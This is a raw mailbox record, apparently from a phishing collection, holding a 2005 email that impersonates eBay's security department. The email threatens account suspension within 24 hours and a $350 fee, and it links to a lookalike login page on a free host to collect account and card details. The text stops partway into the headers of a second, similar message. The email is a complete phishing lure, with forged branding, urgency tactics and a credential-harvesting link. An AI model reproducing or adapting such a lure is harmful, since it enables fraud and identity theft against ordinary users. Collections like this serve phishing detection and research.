From: "eBay Security Department" <confirm@ebay.com>
Reply-To: "eBay Security Department" <confirm@ebay.com>
To: jose@monkey.org
Subject: Confirm your eBay account
Date: Sat, 13 Aug 2005 16:04:00 -0600
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--4883161509994507"
X-Priority: 1
X-MSMail-Priority: High
Content-Length: 4111
Lines: 102
Status: O
X-Status: 
X-Keywords:                  
X-UID: 178

----4883161509994507
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script language=3D"JavaScript" type=3D"text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init=3D=3Dtrue) with (navigator) {if ((appName=3D=3D"Netscape")&&(pa=
rseInt(appVersion)=3D=3D4)) {
    document.MM_pgW=3DinnerWidth; document.MM_pgH=3DinnerHeight; onresize=3D=
MM_reloadPage; }}
  else if (innerWidth!=3Ddocument.MM_pgW || innerHeight!=3Ddocument.MM_pgH=
) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>

<body>
<div id=3D"Layer1" style=3D"position:absolute; width:348px; height:31px; z=
-index:1; left: 322px; top: 76px; background-color: #FFFFFF; layer-backgro=
und-color: #FFFFFF; border: 1px none #000000;"><strong>Update 
  Your Account Information Within 24 Hours</strong></div>

<div id=3D"Layer2" style=3D"position:absolute; width:162px; height:115px; =
z-index:6; left: 83px; top: 36px;"><img src=3D"ebay_logo.gif" width=3D"150=
" height=3D"150"></div>
<div id=3D"Layer3" style=3D"position:absolute; width:799px; height:231px; =
z-index:3; left: 18px; top: 215px; background-color: #FFFFFF; layer-backgr=
ound-color: #FFFFFF; border: 1px none #000000;">
  <p>Valued eBay Member,</p>
  <p>According to our site policy you will have to confirm that you are th=
e real 
    owner of the eBay account by completing the following form or else you=
r account 
    will be suspended within 24 hours for investigations.</p>
  <p><strong><font color=3D"#FF0000">Never share your eBay password to any=
one!</font></strong></p>
  <p><font color=3D"#000000">Establish your proof of identity with ID Veri=
fy (free 
    of charge) - an easy way to help others trust you as their trading par=
tner. 
    The process takes about 5 minutes to complete and involves updating yo=
ur eBay 
    information. When you're successfully verified, you will reveive an ID=
 Verify 
    icon <img src=3D"verify-icon.gif" width=3D"16" height=3D"16"> 
    in your feedback profile. Currently, the service is only available to =
residents 
    of the United States and U.S. territories (Puerto Rico, Virgin Islands=
 and 
    Guam.)</font></p>
</div>
<div id=3D"Layer5" style=3D"position:absolute; width:628px; height:442px; =
z-index:5; left: 20px; top: 502px;">
  <p>To update your eBay records</p>
  <p><strong><font color=3D"#FF0000"> <a href=3D"http://matrixnet.100free.=
com/eBayISAPIdll2VerifyHtmEbaySellerSuspendedAccountVerificationSubFormAcc=
ountStatusUpdateCreditCardOnFile/Login.htm?">&gt;&gt;CLICK 
    HERE&lt;&lt;</a></font></strong></p>
  <p><font color=3D"#000000">We appreciate your support and understanding,=
 as we 
    work together to keep eBay safe place to trade. Thank your for you pat=
ience 
    in this matter.</font></p>
  <p><font color=3D"#000000">Trust and Safety Department</font></p>
  <p>eBay INC.</p>
  <p>&nbsp;</p>
  <p><font color=3D"#999999" size=3D"2">Please do not reply to this e-mail=
 as this 
    is only a notification. Mail sent to this adress cannot be answered.</=
font></p>
  <p><strong><font color=3D"#FF0000" size=3D"4">Note: </font></strong><fon=
t color=3D"#999999" size=3D"3">Ignoring 
    this message will cause the Suspension of your account. To reactivate =
it you 
    will have to pay a fee of 350$ .</font></p>
  <p><font color=3D"#333333" size=3D"1">Copyright 1995-2005 <a href=3D"htt=
p://pages.ebay.com/aboutebay.html">eBay 
    INC.</a> All Rights Reserved. Designated trademarks and brands are the=
 property 
    of their respective owners. Use of this Web site constitutes acceptanc=
e of 
    the eBay User Agreement and Privacy Policy. Designated trademarks and =
brands 
    are the property of their respective owners. eBay and the eBay logo ar=
e trademarks 
    of eBay INC. eBay is located at 2145 Hamilton Avenue, San Jose, CA 951=
25.</font></p>
</div>
</body>
</html>


----4883161509994507--

From nobody@hbci.com  Sat Aug 13 08:46:52 2005
Return-Path: <nobody@hbci.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 19452536E72
	for <jose@login.monkey.org>; Sat, 13 Aug 2005 08:46:52 -0400 (EDT)
Received: from mail.hbci.com (ultra.hbci.com [206.230.105.5])
	by mail2.monkey.org (Postfix) with ESMTP id BF9E3183764
	for <jose@monkey.org>; Sat, 13 Aug 2005 08:46:51 -0400 (EDT)
Received: from supernova.hbci.com (supernova.hbci.com [206.230.105.4])
	by mail.hbci.com (Postfix) with ESMTP id 5756C71852
	for <jose@monkey.org>; Sat, 13 Aug 2005 07:46:12 -0500 (CDT)
Received: by supernova.hbci.com (Postfix, from userid 60001)
	id 37C0C178E; Sat, 13 Aug 2005 07:46:12 -0500 (CDT)
To: jose@monkey.org
Subject: eBay Account  - Suspicious Activity
